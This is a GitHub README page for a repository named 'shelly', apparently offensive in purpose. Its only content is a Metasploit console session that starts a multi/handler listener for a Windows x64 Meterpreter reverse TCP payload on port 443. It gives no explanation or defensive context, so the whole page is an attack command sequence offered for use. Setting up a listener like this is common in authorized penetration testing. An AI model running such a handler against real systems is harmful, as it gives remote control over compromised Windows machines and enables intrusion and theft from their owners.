Skip to content

Latest commit

 

History

History
11 lines (10 loc) · 377 Bytes

README.md

File metadata and controls

11 lines (10 loc) · 377 Bytes

shelly

msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set LHOST eth0 LHOST => eth0 msf6 exploit(multi/handler) > set LPORT 443 LPORT => 443 msf6 exploit(multi/handler) > exploit